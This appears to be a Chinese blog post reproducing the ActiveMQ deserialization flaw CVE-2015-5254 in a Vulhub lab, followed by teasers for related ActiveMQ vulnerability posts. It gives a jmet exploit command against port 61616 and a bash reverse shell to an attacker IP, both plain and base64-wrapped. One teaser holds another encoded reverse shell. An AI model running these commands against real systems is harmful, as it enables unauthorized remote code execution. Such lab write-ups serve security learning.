ActiveMQ 反序列化漏洞（CVE-2015-5254）

n1ght_X

已于 2023-01-04 15:49:29 修改

阅读量127

点赞数

文章标签： web安全 Powered by 金山文档

于 2023-01-04 15:47:49 首次发布

本文链接：https://blog.csdn.net/zzzzz1284/article/details/128549269

版权

环境均基于Vulhub

版本、原因

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

特征

监听61616和8161两个端口。其中61616是工作端口，消息在这个端口进行传递；8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面，不过这个漏洞理论上是不需要web的。

利用

构造（可以使用ysoserial）可执行命令的序列化对象

作为一个消息，发送给目标61616端口

访问web管理页面，读取消息，触发漏洞

复现

执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP 61616

在管理界面生成消息队列，点击后触发漏洞

getshell

只需加一条命令直接反弹

bash -i >& /dev/tcp/攻击机IP/6666 0>&1

也可以将上述base64编码

bash -c {echo,base64编码结果}|{base64,-d}|{bash,-i}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

n1ght_X

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ActiveMQ 反序列化漏洞（CVE-2015-5254）

CVE-2015-5254
复制链接

扫一扫

ActiveMQ漏洞

公众号shadow sock7

05-11

1247

参考： ActiveMQ漏洞利用方法总结 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md https://github.com/Xyntax/POC-T/blob/2.0/script/activemq-weakpass.

CVE-2016-3088（ActiveMQ任意文件写入漏洞）

于高山之巅，方见大河奔涌；于群峰之上，更觉长风浩荡。

02-20

1530

该漏洞出现在 fileserver 应用中，漏洞原理是fileserver 支持写入文件（但不解析 jsp），同时支持移动文件（MOVE 请求）。所以我们只需写入一个文件，然后使用 MOVE 请求将其移动到任意位置，造成任意文件写入漏洞。

参与评论您还未登录，请先登录后发表或查看评论

activemq漏洞合集

weixin_46626737的博客

07-02

613

{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204，成功，但是该路径下没有解析权限，所以需要使用MOVE方法进行移动到正常的物理路径。弱口令：admin/admin/

ActiveMQ 反序列化漏洞 (CVE-2015-5254)

最新发布

m0_74402888的博客

04-30

1312

1.在IDEA中建立好了SpringBoot项目，并配置好了docker容器，然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口，消息在这个端口上传递；

Apache ActiveMQ (版本＜ 5.18.3) (CVE-2023-46604)RCE修复方案/缓解方案

士心的博客

10-31

3307

CVE-2023-46604

ActiveMQ 反序列化漏洞（CVE-2015-5254）利用工具

08-15

在2015年，ActiveMQ被发现存在一个严重的安全漏洞，被称为CVE-2015-5254，这是一个反序列化漏洞，允许攻击者通过精心构造的恶意消息来执行任意代码，从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...

ActiveMQ反序列化漏洞（CVE-2015-5254）漏洞利用工具

11-25

ActiveMQ反序列化漏洞（CVE-2015-5254）漏洞利用工具，说明文档已存在请进行查看

activemq-cpp-library-3.9.5 编译的windows库文件，支持vs2015、vs2017

07-21

总之，ActiveMQ-CPP Library 3.9.5为C++开发者提供了与ActiveMQ交互的便捷方式，结合Visual Studio 2015和2017的支持，能够在Windows平台上高效地构建消息驱动的应用程序。通过理解其核心组件和使用方法，开发者可以...

apache-activemq-5.16.5-bin.tar.gz 下载（5积分）

08-17

Apache ActiveMQ是Apache软件基金会的一个开源项目，是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现，支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用，使用STOMP协议通过websockets在Web...

apache-activemq-5.16.5

12-27

标题"apache-activemq-5.16.5"指的是该软件的一个特定版本，即5.16.5版本，通常每个新版本都会包含错误修复、性能提升以及新功能的添加。描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...

activemq系列漏洞复现

m0_49420271的博客

06-07

2848

vulhub中activemq系列漏洞复现

Apache ActiveMQ RCE漏洞复现（CVE-2023-46604）

0xSec

10-26

8082

ActiveMQ是一个开源的消息代理和集成模式服务器，它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目，用于实现消息中间件，帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞，Apache ActiveMQ在默认安装下开放了61616服务端口，而该端口并没有对传入数据进行适当的过滤，从而使攻击者能够构造恶意数据以实现远程代码执行。

ActiveMQ漏洞总结

qq_42176207的博客

05-08

7628

ActiveMQ Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。随着中间件的启动，会打开两个端口，61616是工作端口，消息在这个端口进行传递；8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器，它为基于 Java 的 web 容器，例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac

（CVE-2017-15709）ActiveMQ 信息泄漏漏洞 0day 漏洞复现

大壮

12-26

493

（CVE-2017-15709）ActiveMQ 信息泄漏漏洞 0day 漏洞复现

常见危险端口服务及对应的漏洞